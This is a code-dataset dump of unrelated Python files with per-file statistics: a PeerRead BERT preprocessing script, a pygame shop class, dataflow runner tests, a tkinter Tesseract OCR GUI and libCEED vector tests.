example_tokens = example_tokens[0:(max_seq_length - 2)]
# The convention in BERT for single sequences is:
# tokens: [CLS] the dog is hairy . [SEP]
# type_ids: 0 0 0 0 0 0 0
#
# Where "type_ids" are used to indicate whether this is the first
# sequence or the second sequence. (vv: Not relevant for us)
# For classification tasks, the first vector (corresponding to [CLS]) is
# used as as the "sentence vector". Note that this only makes sense because
# the entire model is fine-tuned.
# vv: segment_ids seem to be the same as type_ids
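# Worked example (hypothetical): with max_seq_length = 8 and example_tokens = ["the", "dog"]
#   tokens      -> ["[CLS]", "the", "dog", "[SEP]"]
#   segment_ids -> [0, 0, 0, 0, 0, 0, 0, 0]   (after the zero-padding below)
#   input_mask  -> [1, 1, 1, 1, 0, 0, 0, 0]
#   input_ids   -> the tokenizer ids of `tokens`, zero-padded to length 8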
tokens = []
segment_ids = []
tokens.append("[CLS]")
segment_ids.append(0)
for token in example_tokens:
tokens.append(token)
segment_ids.append(0)
tokens.append("[SEP]")
segment_ids.append(0)
input_ids = tokenizer.convert_tokens_to_ids(tokens)
# The mask has 1 for real tokens and 0 for padding tokens. Only real
# tokens are attended to.
input_mask = [1] * len(input_ids)
# Zero-pad up to the sequence length.
while len(input_ids) < max_seq_length:
input_ids.append(0)
input_mask.append(0)
segment_ids.append(0)
assert len(input_ids) == max_seq_length
assert len(input_mask) == max_seq_length
assert len(segment_ids) == max_seq_length
return input_ids, input_mask, segment_ids
def paper_to_bert_Example(text_features, context_features, max_seq_length, tokenizer):
"""
Parses the input paper into a tf.Example as expected by Bert
Note: the docs for tensorflow Example are awful ¯\_(ツ)_/¯
"""
abstract_features = {}
abstract_tokens, abstract_padding_mask, _ = \
bert_process_sentence(text_features['abstract'], max_seq_length, tokenizer)
abstract_features["token_ids"] = _int64_feature(abstract_tokens)
abstract_features["token_mask"] = _int64_feature(abstract_padding_mask)
# abstract_features["segment_ids"] = create_int_feature(feature.segment_ids) TODO: ommission may cause bugs
# abstract_features["label_ids"] = _int64_feature([feature.label_id])
# non-sequential features
tf_context_features, tf_context_features_types = _dict_of_nonlist_numerical_to_tf_features(context_features)
features = {**tf_context_features, **abstract_features}
tf_example = tf.train.Example(features=tf.train.Features(feature=features))
return tf_example
def _int64_feature(value):
"""Wrapper for inserting an int64 Feature into a SequenceExample proto,
e.g, An integer label.
"""
if isinstance(value, list):
return tf.train.Feature(int64_list=tf.train.Int64List(value=value))
else:
return tf.train.Feature(int64_list=tf.train.Int64List(value=[value]))
def _float_feature(value):
"""Wrapper for inserting a float Feature into a SequenceExample proto,
e.g, An integer label.
"""
if isinstance(value, list):
return tf.train.Feature(float_list=tf.train.FloatList(value=value))
else:
return tf.train.Feature(float_list=tf.train.FloatList(value=[value]))
def _bytes_feature(value):
"""Wrapper for inserting a bytes Feature into a SequenceExample proto,
e.g, an image in byte
"""
# return tf.train.Feature(bytes_list=tf.train.BytesList(value=[str(value)]))
return tf.train.Feature(bytes_list=tf.train.BytesList(value=[value]))
def _dict_of_nonlist_numerical_to_tf_features(my_dict):
"""
Strip out non-numerical features
Returns tf_features_dict: a dictionary suitable for passing to tf.train.example
tf_types_dict: a dictionary of the tf types of previous dict
"""
tf_types_dict = {}
tf_features_dict = {}
for k, v in my_dict.items():
if isinstance(v, int) or isinstance(v, bool):
tf_features_dict[k] = _int64_feature(v)
tf_types_dict[k] = tf.int64
elif isinstance(v, float):
tf_features_dict[k] = _float_feature(v)
tf_types_dict[k] = tf.float32
else:
pass
return tf_features_dict, tf_types_dict
venues = {'acl': 1,
'conll': 2,
'iclr': 3,
'nips': 4,
'icml': 5,
'emnlp': 6,
'aaai': 7,
'hlt-naacl': 8,
'arxiv': 0}
def _venues(venue_name):
if venue_name.lower() in venues:
return venues[venue_name.lower()]
else:
return -1
def _arxiv_subject(subjects):
subject = subjects[0]
if 'lg' in subject.lower():
return 0
elif 'cl' in subject.lower():
return 1
elif 'ai' in subject.lower():
return 2
else:
raise Exception("arxiv subject not recognized")
def clean_PeerRead_dataset(review_json_dir, parsedpdf_json_dir,
venue, year,
out_dir, out_file,
max_abs_len, tokenizer,
default_accept=1,
is_arxiv = False):
if not os.path.exists(out_dir):
os.makedirs(out_dir)
print('Reading reviews from...', review_json_dir)
paper_json_filenames = sorted(glob.glob('{}/*.json'.format(review_json_dir)))
with tf.python_io.TFRecordWriter(out_dir + "/" + out_file) as writer:
for idx, paper_json_filename in enumerate(paper_json_filenames):
text_features, context_features = process_json_paper(paper_json_filename, parsedpdf_json_dir, tokenizer)
if context_features['accepted'] is None: # missing for conferences other than ICLR (we only see accepts)
context_features['accepted'] = default_accept
many_split = rng.randint(0, 100) # useful for easy data splitting later
# other context features
arxiv = -1
if is_arxiv:
with io.open(paper_json_filename) as json_file:
loaded = json.load(json_file)
year = parse_date(loaded['DATE_OF_SUBMISSION']).year
venue = _venues(loaded['conference'])
arxiv = _arxiv_subject([loaded['SUBJECTS']])
extra_context = {'id': idx, 'venue': venue, 'year': year, 'many_split': many_split,
'arxiv': arxiv}
context_features.update(extra_context)
# turn it into a tf.data example
paper_ex = paper_to_bert_Example(text_features, context_features,
max_seq_length=max_abs_len, tokenizer=tokenizer)
writer.write(paper_ex.SerializeToString())
def main():
parser = argparse.ArgumentParser()
parser.add_argument('--review-json-dir', type=str, default='../dat/PeerRead/arxiv.all/all/reviews')
parser.add_argument('--parsedpdf-json-dir', type=str, default='../dat/PeerRead/arxiv.all/all/parsed_pdfs')
parser.add_argument('--out-dir', type=str, default='../dat/PeerRead/proc')
parser.add_argument('--out-file', type=str, default='arxiv-all.tf_record')
parser.add_argument('--vocab-file', type=str, default='../../bert/pre-trained/uncased_L-12_H-768_A-12/vocab.txt')
parser.add_argument('--max-abs-len', type=int, default=250)
parser.add_argument('--venue', type=int, default=0)
parser.add_argument('--year', type=int, default=2017)
args = parser.parse_args()
tokenizer = tokenization.FullTokenizer(
vocab_file=args.vocab_file, do_lower_case=True)
clean_PeerRead_dataset(args.review_json_dir, args.parsedpdf_json_dir,
args.venue, args.year,
args.out_dir, args.out_file,
args.max_abs_len, tokenizer, is_arxiv=True)
if __name__ == "__main__":
main()
| 33.896552
| 132
| 0.662665
| 1,257
| 9,830
| 4.945903
| 0.249006
| 0.016889
| 0.021232
| 0.019302
| 0.189641
| 0.175808
| 0.130931
| 0.111629
| 0.105839
| 0.105839
| 0
| 0.013627
| 0.238555
| 9,830
| 289
| 133
| 34.013841
| 0.8167
| 0.219532
| 0
| 0.06875
| 0
| 0
| 0.073226
| 0.017841
| 0
| 0
| 0
| 0.00346
| 0.01875
| 1
| 0.06875
| false
| 0.00625
| 0.075
| 0
| 0.23125
| 0.0125
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
1
| 0
|
60fad164495b1d30558324f3422b6ab9ad4d496c
| 5,268
|
py
|
Python
|
lib/shop.py
|
ZakDoesGaming/OregonTrail
|
90cab35536ac5c6ba9e772ac5c29c914017c9c23
|
[
"MIT"
] | 6
|
2018-05-07T04:04:58.000Z
|
2021-05-15T17:44:16.000Z
|
lib/shop.py
|
ZakDoesGaming/OregonTrail
|
90cab35536ac5c6ba9e772ac5c29c914017c9c23
|
[
"MIT"
] | null | null | null |
lib/shop.py
|
ZakDoesGaming/OregonTrail
|
90cab35536ac5c6ba9e772ac5c29c914017c9c23
|
[
"MIT"
] | 2
|
2017-05-27T17:06:23.000Z
|
2020-08-26T17:57:10.000Z
|
from pygame import Surface, font
from copy import copy
from random import randint, choice
import string
from lib.transactionButton import TransactionButton
SHOP_PREFIX = ["archer", "baker", "fisher", "miller", "rancher", "robber"]
SHOP_SUFFIX = ["cave", "creek", "desert", "farm", "field", "forest", "hill", "lake", "mountain", "pass", "valley", "woods"]
class Shop():
def __init__(self, name, inventory, priceModifier, groupInventory, groupMoney, itemPrices, position, blitPosition, money, resourcePath):
self.yValue = 40
self.groupInventory = groupInventory
self.groupMoney = groupMoney
self.priceModifier = priceModifier
self.itemPrices = itemPrices
self.inventory = inventory
self.position = position
self.blitPosition = blitPosition
self.resourcePath = resourcePath
self.buyButtonList = []
self.sellButtonList = []
self.xPos = (-self.position * 40) + 1280
self.shopSurface = Surface((500, 300)).convert()
self.sepLine = Surface((self.shopSurface.get_width(), 10)).convert()
self.sepLine.fill((0, 0, 0))
self.invContainer = Surface((self.shopSurface.get_width() - 20,
self.shopSurface.get_height() / 2 - 35)).convert()
self.invContainer.fill((255, 255, 255))
self.titleFont = font.Font("res/fonts/west.ttf", 17)
self.textFont = font.Font("res/fonts/west.ttf", 15)
if (name == ""):
self.name = (choice(SHOP_PREFIX) + "'s " + choice(SHOP_SUFFIX)).capitalize()
else:
self.name = name
if (self.inventory == {}):
inventoryRandom = copy(self.groupInventory)
for key in list(inventoryRandom.keys()):
inventoryRandom[key] = randint(0, 10)
inventoryRandom["Food"] *= 20
self.inventory = inventoryRandom
if (money is None):
self.money = randint(200, 500)
else:
self.money = money
self.render()
def get_surface(self):
self.render()
return self.shopSurface
def update(self, groupInv, groupMoney):
self.groupInventory = groupInv
self.groupMoney = groupMoney
self.render()
def move(self, moveValue):
self.xPos += (2 * moveValue)
self.render()
def render(self):
self.yValue = 40
self.shopSurface.fill((133, 94, 66))
self.shopSurface.blit(self.titleFont.render(self.name + " - $" + str(self.money), 1, (0, 0, 255)), (10, 5))
self.shopSurface.blit(self.invContainer, (10, 25))
self.shopSurface.blit(self.invContainer, (10, self.shopSurface.get_height() / 2 + 30))
self.shopSurface.blit(self.textFont.render("Inventory", 1, (255, 0, 0)), (10, 25))
self.shopSurface.blit(self.textFont.render("Amount", 1, (255, 0, 0)), (130, 25))
self.shopSurface.blit(self.textFont.render("Price", 1, (255, 0, 0)), (200, 25))
for key in list(self.inventory.keys()):
self.shopSurface.blit(self.textFont.render(key + ":", 1, (0, 0, 0)), (10, self.yValue))
self.shopSurface.blit(self.textFont.render(str(self.inventory[key]), 1,
(0, 0, 0)), (150, self.yValue))
self.shopSurface.blit(self.textFont.render("$"+str(self.itemPrices[key] * self.priceModifier), 1,
(0, 0, 0)), (200, self.yValue))
if (len(self.buyButtonList) < len(self.inventory.keys())):
buttonPos = tuple(map(sum, zip(self.blitPosition, (250, self.yValue))))
self.buyButtonList.append(TransactionButton(transaction = "buy",
item = key,
imagePosition = (250, self.yValue),
rectPosition = buttonPos,
resourcePath = self.resourcePath))
self.yValue += 30
for button in self.buyButtonList:
self.shopSurface.blit(button.image, button.imagePosition)
self.shopSurface.blit(self.sepLine, (0, float(self.shopSurface.get_height()) / 2))
self.shopSurface.blit(self.titleFont.render("You - $" + str(self.groupMoney), 1, (0, 0, 255)),
(10, float(self.shopSurface.get_height()) / 2 + 10))
self.shopSurface.blit(self.titleFont.render("Inventory", 1, (255, 0, 0)),
(10, float(self.shopSurface.get_height()) / 2 + 30))
self.shopSurface.blit(self.titleFont.render("Amount", 1, (255, 0, 0)),
(130, float(self.shopSurface.get_height()) / 2 + 30))
self.shopSurface.blit(self.titleFont.render("Price", 1, (255, 0, 0)),
(200, float(self.shopSurface.get_height()) / 2 + 30))
self.yValue = (float(self.shopSurface.get_height()) / 2) + 45
for key in list(self.groupInventory.keys()):
self.shopSurface.blit(self.textFont.render(key + ":", 1, (0, 0, 0)), (10, self.yValue))
self.shopSurface.blit(self.textFont.render(str(self.groupInventory[key]), 1,
(0, 0, 0)), (150, self.yValue))
self.shopSurface.blit(self.textFont.render("$" + str(self.itemPrices[key] * self.priceModifier), 1,
(0, 0, 0)), (200, self.yValue))
if (len(self.sellButtonList) < len(self.inventory.keys())):
buttonPos = tuple(map(sum, zip(self.blitPosition, (250, self.yValue))))
self.sellButtonList.append(TransactionButton(transaction = "sell",
item = key,
imagePosition = (250, self.yValue),
rectPosition = buttonPos,
resourcePath = self.resourcePath))
self.yValue += 30
for button in self.sellButtonList:
self.shopSurface.blit(button.image, button.imagePosition)
| 41.480315
| 137
| 0.650721
| 643
| 5,268
| 5.301711
| 0.200622
| 0.140804
| 0.105896
| 0.114696
| 0.523614
| 0.485186
| 0.397771
| 0.306248
| 0.295688
| 0.295688
| 0
| 0.050152
| 0.186219
| 5,268
| 127
| 138
| 41.480315
| 0.745043
| 0
| 0
| 0.32381
| 0
| 0
| 0.038337
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.047619
| false
| 0.009524
| 0.047619
| 0
| 0.114286
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
1
| 0
|
60fb27a39e6c08f8aae7d5554b69bcd58cf5b1d9
| 2,047
|
py
|
Python
|
core/dataflow/test/test_runners.py
|
ajmal017/amp
|
8de7e3b88be87605ec3bad03c139ac64eb460e5c
|
[
"BSD-3-Clause"
] | null | null | null |
core/dataflow/test/test_runners.py
|
ajmal017/amp
|
8de7e3b88be87605ec3bad03c139ac64eb460e5c
|
[
"BSD-3-Clause"
] | null | null | null |
core/dataflow/test/test_runners.py
|
ajmal017/amp
|
8de7e3b88be87605ec3bad03c139ac64eb460e5c
|
[
"BSD-3-Clause"
] | null | null | null |
import logging
import numpy as np
import core.dataflow as dtf
import helpers.unit_test as hut
_LOG = logging.getLogger(__name__)
class TestRollingFitPredictDagRunner(hut.TestCase):
def test1(self) -> None:
"""
Test the DagRunner using `ArmaReturnsBuilder`
"""
dag_builder = dtf.ArmaReturnsBuilder()
config = dag_builder.get_config_template()
dag_builder.get_dag(config)
#
dag_runner = dtf.RollingFitPredictDagRunner(
config=config,
dag_builder=dag_builder,
start="2010-01-04 09:30",
end="2010-01-04 15:30",
retraining_freq="H",
retraining_lookback=4,
)
result_bundles = list(dag_runner.fit_predict())
np.testing.assert_equal(len(result_bundles), 2)
class TestIncrementalDagRunner(hut.TestCase):
def test1(self) -> None:
"""
Test the DagRunner using `ArmaReturnsBuilder`
"""
dag_builder = dtf.ArmaReturnsBuilder()
config = dag_builder.get_config_template()
# Create DAG and generate fit state.
dag = dag_builder.get_dag(config)
dag.run_leq_node("rets/clip", "fit")
fit_state = dtf.get_fit_state(dag)
#
dag_runner = dtf.IncrementalDagRunner(
config=config,
dag_builder=dag_builder,
start="2010-01-04 15:30",
end="2010-01-04 15:45",
freq="5T",
fit_state=fit_state,
)
result_bundles = list(dag_runner.predict())
self.assertEqual(len(result_bundles), 4)
# Check that dataframe results of `col` do not retroactively change
# over successive prediction steps (which would suggest future
# peeking).
col = "vwap_ret_0_vol_2_hat"
for rb_i, rb_i_next in zip(result_bundles[:-1], result_bundles[1:]):
srs_i = rb_i.result_df[col]
srs_i_next = rb_i_next.result_df[col]
self.assertTrue(srs_i.compare(srs_i_next[:-1]).empty)
| 31.984375
| 76
| 0.616512
| 247
| 2,047
| 4.8583
| 0.42915
| 0.083333
| 0.053333
| 0.025
| 0.405
| 0.358333
| 0.291667
| 0.291667
| 0.291667
| 0.291667
| 0
| 0.040273
| 0.284319
| 2,047
| 63
| 77
| 32.492063
| 0.77884
| 0.128969
| 0
| 0.238095
| 0
| 0
| 0.057192
| 0
| 0
| 0
| 0
| 0
| 0.071429
| 1
| 0.047619
| false
| 0
| 0.095238
| 0
| 0.190476
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
1
| 0
|
60fb78d100400013bb9e1879a2d59065d01b4f6b
| 4,478
|
py
|
Python
|
Main Project/Main_Program.py
|
hmnk-1967/OCR-Python-Project-CS-BUIC
|
28c72d9913a25655f6183a7b960e527a0432c8e1
|
[
"MIT"
] | null | null | null |
Main Project/Main_Program.py
|
hmnk-1967/OCR-Python-Project-CS-BUIC
|
28c72d9913a25655f6183a7b960e527a0432c8e1
|
[
"MIT"
] | null | null | null |
Main Project/Main_Program.py
|
hmnk-1967/OCR-Python-Project-CS-BUIC
|
28c72d9913a25655f6183a7b960e527a0432c8e1
|
[
"MIT"
] | null | null | null |
import tkinter.messagebox
from tkinter import *
import tkinter as tk
from tkinter import filedialog
import numpy
import pytesseract #Python wrapper for Google-owned OCR engine known by the name of Tesseract.
import cv2
from PIL import Image, ImageTk
import os
root = tk.Tk()
root.title("Object Character Recognizer")
root.geometry("1280x720")
test_image = None
def browse_image():
fin = filedialog.askopenfilename(initialdir=os.getcwd(), title="Select Image File", filetypes=(("PNG Files", "*.png"), ("JPG Files", "*.jpg"), ("All Files", "*.*")))
global test_image
image = Image.open(fin)
test_image = image
img = ImageTk.PhotoImage(image.resize((650, 400)))
lb = tk.Label(image=img)
lb.place(x=25, y=50)
root.mainloop()
def use_ocr_default():
try:
global test_image
messge = None
#OEM stands for OCR Engine Mode and PSM stands for Page Segmentation Mode.
#OEM defines what kind of OCR engine is to be used (this defines the dataset that would be used to cross-match
#the available data with the testing data).
#PSM defines how Tesseract will treat the image that supposedly contains characters and how it will extract the
#data from the image.
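#For reference (approximate meanings of the Tesseract flags used below): --oem 1 selects the
#LSTM-based engine, --psm 3 is fully automatic page segmentation, and --psm 7 (used in
#use_ocr_singletext) treats the image as a single line of text.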
tess = pytesseract.image_to_string(test_image, config='-l eng --oem 1 --psm 3')
label = Label(messge, text='Result:')
label.place(x=850, y=320)
display_message = Text(messge, width=46, height=15)
display_message.insert(END, str(tess))
display_message.config(state=DISABLED)
display_message.delete(0, END)
display_message.place(x=890, y=330)
except: #Print an error message when the user inputs an incompatible image.
tkinter.messagebox.showinfo('Something\'s Wrong!', 'Your picture may not contain English characters or you may have not selected a picture. Please select a picture with detectable English characters.')
def use_ocr_handwriting():
try:
global test_image
opencv_img = numpy.array(test_image)
opencv_img = opencv_img[:, :, ::-1].copy() #This line is used to convert RGB PIL image file to BGR cv2 image file.
blurred_img = cv2.medianBlur(opencv_img, 5)
gray_img = cv2.cvtColor(blurred_img, cv2.COLOR_BGR2GRAY)
thresh, binary = cv2.threshold(gray_img, 122, 255, cv2.THRESH_BINARY)
messge = None
tess = pytesseract.image_to_string(binary, config='-l eng --oem 1 --psm 3')
label = Label(messge, text='Result:')
label.place(x=850, y=320)
display_message = Text(messge, width=46, height=15)
display_message.insert(END, str(tess))
display_message.config(state=DISABLED)
display_message.delete(0, END)
display_message.place(x=890, y=330)
except:
tkinter.messagebox.showinfo('Something\'s Wrong!', 'Your picture may not contain English characters or you may have not selected a picture. Please select a picture with detectable English characters.')
def use_ocr_singletext():
try:
global test_image
messge = None
tess = pytesseract.image_to_string(test_image, config='-l eng --oem 1 --psm 7')
label = Label(messge, text='Result:')
label.place(x=850, y=320)
display_message = Text(messge, width=46, height=15)
display_message.delete('1.0', END) #Clear any previous text before inserting the new result.
display_message.insert(END, str(tess))
display_message.config(state=DISABLED) #Make the result box read-only once the text is in place.
display_message.place(x=890, y=330)
except Exception:
tkinter.messagebox.showinfo('Something\'s Wrong!', 'Your picture may not contain English characters or you may not have selected a picture. Please select a picture with detectable English characters.')
w = tk.LabelFrame(root, text="Image:", width=768, height=600)
w.place(x=20, y=10)
w.pack_propagate(0)
w1 = tk.LabelFrame(root, text="Extracted Text:", width=500, height=310)
w1.place(x=800, y=300)
w2 = tk.LabelFrame(root, text="Operations:", width=350, height=280)
w2.place(x=800, y=10)
btn1 = tk.Button(w2, text="Load Image", padx=40, pady=10, command=browse_image)
btn1.place(x=22, y=20)
btn1 = tk.Button(w2, text="Run Handwritten OCR", padx=40, pady=10, command=use_ocr_handwriting)
btn1.place(x=22, y=80)
btn1 = tk.Button(w2, text="Run Default OCR", padx=40, pady=10, command=use_ocr_default)
btn1.place(x=22, y=140)
btn1 = tk.Button(w2, text="Run Single Text OCR", padx=40, pady=10, command=use_ocr_singletext)
btn1.place(x=22, y=200)
root.mainloop()
| 44.336634
| 209
| 0.692497
| 664
| 4,478
| 4.587349
| 0.308735
| 0.068943
| 0.019698
| 0.018385
| 0.516415
| 0.487196
| 0.451412
| 0.435653
| 0.408076
| 0.408076
| 0
| 0.048106
| 0.192273
| 4,478
| 100
| 210
| 44.78
| 0.794028
| 0.125726
| 0
| 0.458824
| 0
| 0.011765
| 0.079345
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.047059
| false
| 0
| 0.105882
| 0
| 0.152941
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
1
| 0
|
60fc4c563a78f035d637363b6ec3e80079aa3d28
| 10,095
|
py
|
Python
|
python/tests/test-1-vector.py
|
wence-/libCEED
|
c785ad36304ed34c5edefb75cf1a0fe5445db17b
|
[
"BSD-2-Clause"
] | null | null | null |
python/tests/test-1-vector.py
|
wence-/libCEED
|
c785ad36304ed34c5edefb75cf1a0fe5445db17b
|
[
"BSD-2-Clause"
] | null | null | null |
python/tests/test-1-vector.py
|
wence-/libCEED
|
c785ad36304ed34c5edefb75cf1a0fe5445db17b
|
[
"BSD-2-Clause"
] | null | null | null |
# Copyright (c) 2017, Lawrence Livermore National Security, LLC. Produced at
# the Lawrence Livermore National Laboratory. LLNL-CODE-734707. All Rights
# reserved. See files LICENSE and NOTICE for details.
#
# This file is part of CEED, a collection of benchmarks, miniapps, software
# libraries and APIs for efficient high-order finite element and spectral
# element discretizations for exascale applications. For more information and
# source code availability see http://github.com/ceed.
#
# The CEED research is supported by the Exascale Computing Project 17-SC-20-SC,
# a collaborative effort of two U.S. Department of Energy organizations (Office
# of Science and the National Nuclear Security Administration) responsible for
# the planning and preparation of a capable exascale ecosystem, including
# software, applications, hardware, advanced system engineering and early
# testbed platforms, in support of the nation's exascale computing imperative.
# @file
# Test Ceed Vector functionality
import os
import libceed
import numpy as np
import check
TOL = libceed.EPSILON * 256
# -------------------------------------------------------------------------------
# Utility
# -------------------------------------------------------------------------------
def check_values(ceed, x, value):
with x.array_read() as b:
for i in range(len(b)):
assert b[i] == value
# -------------------------------------------------------------------------------
# Test creation, setting, reading, restoring, and destroying of a vector
# -------------------------------------------------------------------------------
def test_100(ceed_resource):
ceed = libceed.Ceed(ceed_resource)
n = 10
x = ceed.Vector(n)
a = np.arange(10, 10 + n, dtype=ceed.scalar_type())
x.set_array(a, cmode=libceed.USE_POINTER)
with x.array_read() as b:
for i in range(n):
assert b[i] == 10 + i
# -------------------------------------------------------------------------------
# Test setValue
# -------------------------------------------------------------------------------
def test_101(ceed_resource):
ceed = libceed.Ceed(ceed_resource)
n = 10
x = ceed.Vector(n)
value = 1
a = np.arange(10, 10 + n, dtype=ceed.scalar_type())
x.set_array(a, cmode=libceed.USE_POINTER)
with x.array() as b:
for i in range(len(b)):
assert b[i] == 10 + i
x.set_value(3.0)
check_values(ceed, x, 3.0)
del x
x = ceed.Vector(n)
# Set value before setting or getting the array
x.set_value(5.0)
check_values(ceed, x, 5.0)
# -------------------------------------------------------------------------------
# Test getArrayRead state counter
# -------------------------------------------------------------------------------
def test_102(ceed_resource):
ceed = libceed.Ceed(ceed_resource)
n = 10
x = ceed.Vector(n)
x.set_value(0)
# Two read accesses should not generate an error
a = x.get_array_read()
b = x.get_array_read()
x.restore_array_read()
x.restore_array_read()
# -------------------------------------------------------------------------------
# Test setting one vector from array of another vector
# -------------------------------------------------------------------------------
def test_103(ceed_resource):
ceed = libceed.Ceed(ceed_resource)
n = 10
x = ceed.Vector(n)
y = ceed.Vector(n)
a = np.arange(10, 10 + n, dtype=ceed.scalar_type())
x.set_array(a, cmode=libceed.USE_POINTER)
with x.array() as x_array:
y.set_array(x_array, cmode=libceed.USE_POINTER)
with y.array_read() as y_array:
for i in range(n):
assert y_array[i] == 10 + i
# -------------------------------------------------------------------------------
# Test getArray to modify array
# -------------------------------------------------------------------------------
def test_104(ceed_resource):
ceed = libceed.Ceed(ceed_resource)
n = 10
x = ceed.Vector(n)
a = np.zeros(n, dtype=ceed.scalar_type())
x.set_array(a, cmode=libceed.USE_POINTER)
with x.array() as b:
b[3] = -3.14
if libceed.lib.CEED_SCALAR_TYPE == libceed.SCALAR_FP32:
assert a[3] == np.float32(-3.14)
else:
assert a[3] == -3.14
# -------------------------------------------------------------------------------
# Test creation, setting, reading, restoring, and destroying of a vector using
# CEED_MEM_DEVICE
# -------------------------------------------------------------------------------
def test_105(ceed_resource):
# Skip test for non-GPU backend
if 'gpu' in ceed_resource:
ceed = libceed.Ceed(ceed_resource)
n = 10
x = ceed.Vector(n)
y = ceed.Vector(n)
a = np.arange(10, 10 + n, dtype=ceed.scalar_type())
x.set_array(a, cmode=libceed.USE_POINTER)
arr = x.get_array_read(memtype=libceed.MEM_DEVICE)
y.set_array(arr, memtype=libceed.MEM_DEVICE)
x.restore_array_read()
with y.array_read() as b:
for i in range(n):
assert b[i] == 10 + i
# -------------------------------------------------------------------------------
# Test view
# -------------------------------------------------------------------------------
def test_107(ceed_resource, capsys):
ceed = libceed.Ceed(ceed_resource)
n = 10
x = ceed.Vector(n)
a = np.arange(10, 10 + n, dtype=ceed.scalar_type())
x.set_array(a, cmode=libceed.USE_POINTER)
print(x)
stdout, stderr, ref_stdout = check.output(capsys)
assert not stderr
assert stdout == ref_stdout
# -------------------------------------------------------------------------------
# Test norms
# -------------------------------------------------------------------------------
def test_108(ceed_resource, capsys):
ceed = libceed.Ceed(ceed_resource)
n = 10
x = ceed.Vector(n)
a = np.arange(0, n, dtype=ceed.scalar_type())
for i in range(n):
if (i % 2 == 0):
a[i] *= -1
x.set_array(a, cmode=libceed.USE_POINTER)
norm = x.norm(normtype=libceed.NORM_1)
assert abs(norm - 45.) < TOL
norm = x.norm()
assert abs(norm - np.sqrt(285.)) < TOL
norm = x.norm(normtype=libceed.NORM_MAX)
assert abs(norm - 9.) < TOL
# -------------------------------------------------------------------------------
# Test taking the reciprocal of a vector
# -------------------------------------------------------------------------------
def test_119(ceed_resource):
ceed = libceed.Ceed(ceed_resource)
n = 10
x = ceed.Vector(n)
a = np.arange(10, 10 + n, dtype=ceed.scalar_type())
x.set_array(a, cmode=libceed.USE_POINTER)
x.reciprocal()
with x.array_read() as b:
for i in range(n):
assert abs(b[i] - 1. / (10 + i)) < TOL
# -------------------------------------------------------------------------------
# Test AXPY
# -------------------------------------------------------------------------------
def test_121(ceed_resource, capsys):
ceed = libceed.Ceed(ceed_resource)
n = 10
x = ceed.Vector(n)
y = ceed.Vector(n)
a = np.arange(10, 10 + n, dtype=ceed.scalar_type())
x.set_array(a, cmode=libceed.COPY_VALUES)
y.set_array(a, cmode=libceed.COPY_VALUES)
y.axpy(-0.5, x)
with y.array() as b:
assert np.allclose(.5 * a, b)
# -------------------------------------------------------------------------------
# Test pointwise multiplication
# -------------------------------------------------------------------------------
def test_122(ceed_resource, capsys):
ceed = libceed.Ceed(ceed_resource)
n = 10
w = ceed.Vector(n)
x = ceed.Vector(n)
y = ceed.Vector(n)
a = np.arange(0, n, dtype=ceed.scalar_type())
w.set_array(a, cmode=libceed.COPY_VALUES)
x.set_array(a, cmode=libceed.COPY_VALUES)
y.set_array(a, cmode=libceed.COPY_VALUES)
w.pointwise_mult(x, y)
with w.array() as b:
for i in range(len(b)):
assert abs(b[i] - i * i) < 1e-14
w.pointwise_mult(w, y)
with w.array() as b:
for i in range(len(b)):
assert abs(b[i] - i * i * i) < 1e-14
w.pointwise_mult(x, w)
with w.array() as b:
for i in range(len(b)):
assert abs(b[i] - i * i * i * i) < 1e-14
y.pointwise_mult(y, y)
with y.array() as b:
for i in range(len(b)):
assert abs(b[i] - i * i) < 1e-14
# -------------------------------------------------------------------------------
# Test Scale
# -------------------------------------------------------------------------------
def test_123(ceed_resource, capsys):
ceed = libceed.Ceed(ceed_resource)
n = 10
x = ceed.Vector(n)
a = np.arange(10, 10 + n, dtype=ceed.scalar_type())
x.set_array(a, cmode=libceed.COPY_VALUES)
x.scale(-0.5)
with x.array() as b:
assert np.allclose(-.5 * a, b)
# -------------------------------------------------------------------------------
# Test getArrayWrite to modify array
# -------------------------------------------------------------------------------
def test_124(ceed_resource):
ceed = libceed.Ceed(ceed_resource)
n = 10
x = ceed.Vector(n)
with x.array_write() as a:
for i in range(len(a)):
a[i] = 3 * i
with x.array_read() as a:
for i in range(len(a)):
assert a[i] == 3 * i
# -------------------------------------------------------------------------------
# Test modification of reshaped array
# -------------------------------------------------------------------------------
def test_199(ceed_resource):
"""Modification of reshaped array"""
ceed = libceed.Ceed(ceed_resource)
vec = ceed.Vector(12)
vec.set_value(0.0)
with vec.array(4, 3) as x:
x[...] = np.eye(4, 3)
with vec.array_read(3, 4) as x:
assert np.all(x == np.eye(4, 3).reshape(3, 4))
# -------------------------------------------------------------------------------
| 28.597734
| 81
| 0.470134
| 1,210
| 10,095
| 3.81405
| 0.187603
| 0.075406
| 0.045287
| 0.057638
| 0.554496
| 0.505309
| 0.478873
| 0.478873
| 0.450054
| 0.450054
| 0
| 0.02457
| 0.19366
| 10,095
| 352
| 82
| 28.678977
| 0.542383
| 0.404656
| 0
| 0.555556
| 0
| 0
| 0.000505
| 0
| 0
| 0
| 0
| 0
| 0.116667
| 1
| 0.083333
| false
| 0
| 0.022222
| 0
| 0.105556
